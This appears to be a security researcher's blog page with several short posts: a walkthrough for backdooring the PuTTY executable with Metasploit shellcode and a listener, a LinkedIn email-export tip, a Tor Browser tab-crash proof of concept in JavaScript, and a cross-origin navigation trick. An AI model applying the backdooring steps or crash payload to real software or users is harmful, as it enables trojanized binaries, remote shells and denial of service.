Backdooring Windows Binary

Hi Internet,

I saw multiple methods from may researches specifically, the one who are done with OSCE, Moving further I decided to do the same and successfully replicated. I’m not much of a windows exploit kind of guy, I deal more in browser based exploitation but I have cribbed from the work of other security researchers and their are already many such posts on this. In this example I have used Putty probably you can use any executable's, you can download putty from here.

I add a new code section to the executable using any PE editor such as LordPE.

Remember to allocate enough space, I have allocated 1000 bytes to the .NewSec section in this case the application will not run proper the, open the modified binary in a hex editor and allocate the 1000 byte value at the end of the file.

Save the binary, and the application now runs normally, Open this binary in any debugger and notice the first five instructions in the application copy paste that somewhere we need them.

In the debugger, open the ‘memory view’ to view the address of .NewSec

In my case the memory address was 00376000. We want the code execution of the binary to jump to this address, as this is where we will be placing our shellcode.

Double-click the newly modified instruction to move to the .NewSec section. You should see a lot of free space. Then, we proceed to add 2 instructions which is  PUSHAD, PUSHFD to ‘preserve’ the current registers and flags.

Now that we have push the current registers to the stack, we can start adding the shellcode from address 00376000 onwards. The shell code can be generated using MSF.

Paste the shellcode as ‘binary paste’ in the debugger from address 00376000 and you are all set.
Save the changes and try running the executable and do not forget to setup listener, if our evilness works perfectly we should get shell in the box.

I have crated a Video POC using cmd.exe which implemented by Microsoft through Win32 console.



You can use Backdoor factory or MSF to backdoor windows based exe's

Regards

Dhiraj

Read More

Go ahead and get "email” of all your LinkedIn connections

Hi Internet,

Got, something amazing today @LinkedIn but I believe its more of a privacy issue rather than security or might be a functionality :/

Have you ever wonder, how you get spam mails or phishing,

You: I have no idea how attacker got my email address.

So, this might be one of the case.

Here is how you can export  connections details from your LinkedIn account,

Visit this link as a logged-in user, and it should look something like this.

Click on he radio button which as option "The works: All of the individual files plus more." and request for archive.

Just wait for few seconds and once done you will be able to download your archive, and you will be able to see something like this.



























Once, downloaded the archive file will have different things like,

Opening Connections.csv you may end up with getting all the details for your respective connections such as Name, Email Address, Company etc.

Regards

Dhiraj

Read More

Tor Browser IPC crash at MOZ_CRASH()

Hi Internet,
 
IPC : Inter-process communication is a protocol short form of IPDL is a mozilla specific language to pass messages between  process and threads in secure way.

Note: Most of the IPC based crashes in browser is not eligible for BBB  //Not Sure

Snip Code :

<script>
function tor()
 {
 
    var uristring = unescape("%u4141%u4141");
     
    for(i=0; i <= 50 ; ++i)
 {
        uristring+=uristring;
        document.write(uristring);
    }   
    document.write(uristring);
}
</script>
</head>
<body onload="tor()">
</body>

Running the above code in TOR crashes the tab - 'Gah! This tab has crashed.

Running TOR in debug mode generated this below error :












So, this seems to be kind of a resource exhaustion attack that leads to a crash in TOR,  For instance if you try in a vanilla Firefox it freezes your page and if one disables multiprocess mode one can witness this behavior in a Tor Browser as well.

Running the snip code Asan build gets :



















Looking at the particular code you'll see:

#ifdef MOZ_CRASHREPORTER
      CrashReporter::AnnotateCrashReport(NS_LITERAL_CSTRING("IPCMessageName"), nsDependentCString(msg->name()));
      CrashReporter::AnnotateCrashReport(NS_LITERAL_CSTRING("IPCMessageSize"), nsPrintfCString("%d", msg->size()));
#endif
      MOZ_CRASH("IPC message size is too large");

So, what seems to be happening here is that without --disable-crashreporter (which is used for vanilla Firefox builds) the tab loading your code is stuck in the #ifdef MOZ_CRASHREPORTER block while Tor Browser (which uses --disable-crashreporter) is hitting the MOZ_CRASH() call directly.

This crashes at MOZ_CRASH() because IPC Message is too large. This issue was marked as informative  by TOR via H1

Read More

Navigating to non-same origin windows in browsers.

Lets do this.. Works almost in every browsers. Another Interesting Navigation trick. It is an little-known property of web browsers that one document can always navigate other, non-same-origin windows to arbitrary URLs. Perhaps more interestingly, you can also navigate third-party documents to resources served with Content-Disposition attachment, in which case, you get the original contents of the address bar, plus a rogue download prompt attached to an unsuspecting page that never wanted you to download that file.

Video POC :

No bounty was awarded, because :
"The behavioral of the browser is legit, the same thing happens in chrome or other browsers. We will invalidate your report."

Bug Reported by : Dhiraj Mishra